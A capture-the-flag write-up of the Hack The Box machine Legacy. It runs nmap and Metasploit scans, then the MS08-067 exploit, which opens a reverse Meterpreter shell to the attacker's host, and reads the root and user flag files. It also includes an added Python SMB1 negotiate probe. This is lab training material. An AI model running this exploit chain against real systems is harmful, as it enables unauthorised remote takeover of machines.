HTB Legacy

$sudo nmap -A -T4 -p- 10.10.10.4

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 18:00 CEST
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.53% done; ETC: 18:04 (0:04:18 remaining)
Stats: 0:02:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.27% done; ETC: 18:02 (0:00:00 remaining)
Nmap scan report for 10.10.10.4
Host is up (0.064s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m40s, deviation: 2h07m16s, median: 4d22h57m40s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ea:cf (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-06-24T20:59:26+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 68.62 ms 10.10.14.1
2 68.91 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.78 seconds

Open ports detected:

  • 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  • 445/tcp open microsoft-ds Windows XP microsoft-ds
  • 3389/tcp closed ms-wbt-server

Based on the detected ports, we have SMB here (NetBIOS session service on 139/tcp and direct-hosted SMB on 445/tcp); RDP on 3389/tcp is closed.

$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.4:445        - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
[*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Which SMB version do we have?
Not sure yet…

$nmap -p139 --script smb-protocols 10.10.10.4 -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 19:59 CEST
Nmap scan report for 10.10.10.4
Host is up (0.041s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-protocols: 
|   dialects: 
|_    NT LM 0.12 (SMBv1) [dangerous, but default]

Nmap done: 1 IP address (1 host up) scanned in 50.91 seconds

$nmap -p445 --script smb-protocols 10.10.10.4 -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 20:01 CEST
Nmap scan report for 10.10.10.4
Host is up (0.041s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols: 
|   dialects: 
|_    NT LM 0.12 (SMBv1) [dangerous, but default]

Nmap done: 1 IP address (1 host up) scanned in 50.63 seconds

According to these results, the server only negotiates the NT LM 0.12 dialect, i.e. SMBv1, on both ports 🙂
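What both scans above do under the hood is a single SMB_COM_NEGOTIATE exchange: the client offers a list of dialect strings and the server answers with the index of the one it picks and, for NT LM 0.12, a SecurityMode byte that is exactly where nmap's "message_signing: disabled" and "authentication_level: user" lines come from. The following Python is an added example written for this writeup, not code from the original post or from nmap/Metasploit. It builds that request, decodes the reply, and also recognises the case where a newer server answers an SMB1 negotiate with an SMB2 header (which LEGACY cannot do, matching the "Protocol negotiation failed (SMB2)" line earlier). The host/port in `probe()` are taken from the page; the response bytes in `sample_smb1_response()` are constructed here, not captured from the box.

```python
import socket
import struct

SMB_COM_NEGOTIATE = 0x72

# Dialects offered, oldest first. Offering "SMB 2.002" lets an SMB2-capable
# server switch protocols; an SMBv1-only host can only pick one of the first three.
DIALECTS = ["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "NT LM 0.12", "SMB 2.002"]

# SMB1 header (32 bytes): protocol id, command, NT status, flags, flags2,
# PIDHigh, security signature, reserved, TID, PIDLow, UID, MID
SMB_HDR = "<4sBIBHH8sHHHHH"


def build_negotiate_request(dialects=DIALECTS, mid=1):
    """Return a NetBIOS-session-framed SMB_COM_NEGOTIATE request."""
    header = struct.pack(SMB_HDR, b"\xffSMB", SMB_COM_NEGOTIATE, 0,
                         0x18, 0xC853, 0, b"\x00" * 8, 0, 0, 0xFEFF, 0, mid)
    # Data block: one BufferFormat byte (0x02) + NUL-terminated ASCII name per dialect
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    body = struct.pack("<BH", 0, len(data)) + data       # WordCount=0, ByteCount
    smb = header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb   # NBSS: type 0x00 + 3-byte length


def parse_negotiate_response(frame, dialects=DIALECTS):
    """Decode the server's dialect choice. For NT LM 0.12 also return the
    SecurityMode bits (MS-CIFS 2.2.4.52.2) that scanners report as signing/auth level."""
    if len(frame) < 8:
        raise ValueError("truncated NetBIOS frame")
    smb = frame[4:]
    if smb[:4] == b"\xfeSMB":
        # Server answered with an SMB2 NEGOTIATE response: it is not SMBv1-only.
        return {"dialect": "SMB2+", "smb1_only": False}
    if smb[:4] != b"\xffSMB" or len(smb) < 35:
        raise ValueError("not an SMB1 negotiate response")
    command, status = smb[4], struct.unpack_from("<I", smb, 5)[0]
    if command != SMB_COM_NEGOTIATE or status != 0:
        raise ValueError(f"negotiate failed: cmd=0x{command:02x} status=0x{status:08x}")
    word_count = smb[32]
    if len(smb) < 33 + 2 * word_count:
        raise ValueError("truncated parameter block")
    dialect_index = struct.unpack_from("<H", smb, 33)[0]
    if dialect_index == 0xFFFF:
        return {"dialect": None, "smb1_only": True}   # none of the offered dialects accepted
    result = {"dialect": dialects[dialect_index], "smb1_only": True}
    if word_count == 17:                               # NT LM 0.12 response layout
        sec = smb[35]
        result.update(
            user_level_auth=bool(sec & 0x01),          # nmap: authentication_level: user
            challenge_response=bool(sec & 0x02),       # nmap: challenge_response: supported
            signing_enabled=bool(sec & 0x04),          # nmap: message_signing: disabled
            signing_required=bool(sec & 0x08),
        )
    return result


def probe(host="10.10.10.4", port=445, timeout=5.0):
    """Send one negotiate to a live host (network call; not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        frame = s.recv(4096)
    return parse_negotiate_response(frame)


def sample_smb1_response():
    """Constructed (not captured) NT LM 0.12 response: DialectIndex 2 and
    SecurityMode 0x03 = user-level auth + challenge/response, signing off,
    i.e. the same picture the scans paint of LEGACY."""
    header = struct.pack(SMB_HDR, b"\xffSMB", SMB_COM_NEGOTIATE, 0,
                         0x98, 0xC853, 0, b"\x00" * 8, 0, 0, 0xFEFF, 0, 1)
    # DialectIndex, SecurityMode, MaxMpx, MaxVCs, MaxBuffer, MaxRaw, SessionKey,
    # Capabilities, SystemTime, ServerTimeZone (minutes; -180 = UTC+3), ChallengeLength
    params = struct.pack("<HBHHIIIIqhB", 2, 0x03, 50, 1, 16644, 65536, 0,
                         0xE3FD, 0, -180, 8)
    data = b"\x00" * 8 + "HTB".encode("utf-16-le") + b"\x00\x00"   # challenge + domain
    smb = header + struct.pack("<B", 17) + params + struct.pack("<H", len(data)) + data
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    print(parse_negotiate_response(sample_smb1_response()))
    # print(probe())   # against the lab host
```

Running `probe()` against the box is the same unauthenticated request the scripts send, so it is no noisier than the scans already shown; the SecurityMode decode is also the quickest way to confirm "signing not required" before deciding on relay-style attacks elsewhere.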

$nmap -p445 --script vuln 10.10.10.4 -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 10:36 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.045s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 48.83 seconds

$nmap -p139 --script vuln 10.10.10.4 -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 10:38 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.044s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 39.55 seconds

msf5 > search CVE-2008-4250

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf5 > use 0
msf5 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.4:1031) at 2020-06-20 10:51:31 +0200

meterpreter >

meterpreter > dir

Listing: C:\
============

Mode                 Size               Type  Last modified                    Name
----                 ----               ----  -------------                    ----
100777/rwxrwxrwx     0                  fil   2017-03-16 06:30:44 +0100        AUTOEXEC.BAT
100666/rw-rw-rw-     0                  fil   2017-03-16 06:30:44 +0100        CONFIG.SYS
40777/rwxrwxrwx      0                  dir   2017-03-16 06:20:29 +0100        Documents and Settings
100444/r--r--r--     0                  fil   2017-03-16 06:30:44 +0100        IO.SYS
100444/r--r--r--     0                  fil   2017-03-16 06:30:44 +0100        MSDOS.SYS
100555/r-xr-xr-x     47564              fil   2008-04-13 22:13:04 +0200        NTDETECT.COM
40555/r-xr-xr-x      0                  dir   2017-03-16 06:20:57 +0100        Program Files
40777/rwxrwxrwx      0                  dir   2017-03-16 06:20:30 +0100        System Volume Information
40777/rwxrwxrwx      0                  dir   2017-03-16 06:18:34 +0100        WINDOWS
100666/rw-rw-rw-     211                fil   2017-03-16 06:20:02 +0100        boot.ini
100444/r--r--r--     250048             fil   2008-04-14 00:01:44 +0200        ntldr
236001544/r-xr--r--  51787753582526447  fif   1650092888-02-20 02:25:20 +0100  pagefile.sys

meterpreter > cd Documents\ and\ Settings
meterpreter > dir

Listing: C:\Documents and Settings
==================================


Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 07:07:20 +0100  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 06:20:29 +0100  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 06:20:29 +0100  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 06:32:52 +0100  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 06:32:42 +0100  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 06:33:41 +0100  john

meterpreter > cd Administrator
meterpreter > dir

Listing: C:\Documents and Settings\Administrator
================================================


Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  My Documents
100666/rw-rw-rw-  786432  fil   2017-03-16 07:07:20 +0100  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 07:07:20 +0100  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 07:07:21 +0100  ntuser.ini

meterpreter > cd Desktop
meterpreter > dir

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================


Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 07:18:19 +0100  root.txt

meterpreter > cat root.txt

9934XXXXXXXXXXXXXXXXXXXXXXXXXXXX

meterpreter > cd john
meterpreter > ls

Listing: C:\Documents and Settings\john
=======================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 06:33:41 +0100  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 06:33:41 +0100  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 06:33:42 +0100  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls

Listing: C:\Documents and Settings\john\Desktop
===============================================


Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 07:19:32 +0100  user.txt

meterpreter > cat user.txt

e69aXXXXXXXXXXXXXXXXXXXXXXXXXXXX
